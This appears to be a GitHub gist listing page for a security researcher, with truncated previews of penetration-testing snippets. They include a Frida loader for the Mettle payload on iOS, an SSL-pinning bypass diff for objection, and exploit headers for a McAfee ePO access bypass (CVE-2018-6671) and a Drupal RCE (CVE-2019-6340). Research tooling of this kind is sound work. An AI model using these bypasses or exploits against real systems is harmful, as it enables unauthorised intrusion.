Leon Jacobs leonjza

leonjza / forward.sh
Created October 1, 2019 10:06
Forward a new host port to a running docker container.
#!/bin/bash
# Add a firewall NAT rule to expose a port open in a docker container, on a host.
#
# This is only really useful if the container is already running, and you don't
# want to/can't shut it down, but need a new incoming port open.
#
# Requires `jq` for parsing docker container information.
#
# 2019 @leonjza
leonjza / mettle.js
Created October 1, 2019 08:20
Mettle Frida Module Load Error
const dlib = 'mettle.dylib';
const NSDocumentDirectory = 9;
const NSUserDomainMask = 1
const p = ObjC.classes.NSFileManager.defaultManager()
.URLsForDirectory_inDomains_(NSDocumentDirectory, NSUserDomainMask).lastObject().path();
const dylibPath = p + '/' + dlib;
const cm = new CModule(""+
"#include <glib.h>" +
"" +
leonjza / build-steps.sh
Created August 14, 2019 08:44
objection Jenkins pipeline steps
# Build the target application (PewPew is the name for my app)
xcodebuild build build -workspace PewPew.xcworkspace -scheme PewPew -sdk iphonesimulator12.2
#
# iOS Simulator setup
#
echo "Simulator Setup"
echo "==============="
leonjza / README.md
Last active August 14, 2019 08:38
objection Flex plugin

objection Flex plugin

This plugin should sideload Flex[1], loaded as a plugin in objection[2]. Flex itself should be a shared library (a thin or fat Mach-O matching your target's architecture).

The source code for a shared library called libFlex is included in this gist as .h and .m files. You need to copy the Classes/ directory from the official Flex project[1] into your project.

[1] https://github.com/Flipboard/FLEX
[2] https://github.com/sensepost/objection

leonjza / pinning.ts.diff
Created May 16, 2019 22:16
SSLCertificateChecker-PhoneGap-Plugin Pinning Disable
diff --git a/agent/src/ios/pinning.ts b/agent/src/ios/pinning.ts
index 1f9407a..aa2152a 100644
--- a/agent/src/ios/pinning.ts
+++ b/agent/src/ios/pinning.ts
@@ -283,6 +283,38 @@ export namespace sslpinning {
});
};
+ const cordovaCustomURLConnectionDelegate = (ident: string): InvocationListener => {
+ // https://github.com/EddyVerbruggen/SSLCertificateChecker-PhoneGap-Plugin/blob/
leonjza / README.md
Last active March 2, 2020 07:58
objection Stetho sideload plugin
leonjza / cve-2018-6671.txt
Last active September 26, 2019 07:47
cve-2018-6671 McAfee ePO 5.9.1 Registered Executable Local Access Bypass
# CVE-2018-6671 McAfee ePO 5.9.1 Registered Executable Local Access Bypass
# Specifying an X-Forwarded-For header bypasses the local only check
# https://kc.mcafee.com/corporate/index?page=content&id=SB10240
# https://nvd.nist.gov/vuln/detail/CVE-2018-6671
#
# 2019 @leonjza
#
# Tested on ePO v5.9.1, missing hotfix EPO5xHF1229850
POST /Notifications/testRegExe.do HTTP/1.1
leonjza / cve-2019-6340.py
Last active February 27, 2020 18:39
CVE-2019-6340
#!/usr/bin/env python3
# CVE-2019-6340 Drupal <= 8.6.9 REST services RCE PoC
# 2019 @leonjza
# Technical details for this exploit are available at:
# https://www.drupal.org/sa-core-2019-003
# https://www.ambionics.io/blog/drupal8-rce
# https://twitter.com/jcran/status/1099206271901798400
leonjza / index.html
Created July 23, 2018 21:12
HTML5 Drag 'n drop API test
<html>
<head></head>
<body id="drop_zone" ondragenter="dragEnterHandler(event);">
<div>
<p>Drag one or more files to this Drop Zone ...</p>
</div>
</body>
leonjza / mq_clients.go
Last active June 11, 2018 07:26
IBM MQ "mq_clients" osquery Custom Table
package main
import (
"context"
"flag"
"log"
"os"
"os/exec"
"regexp"
"strings"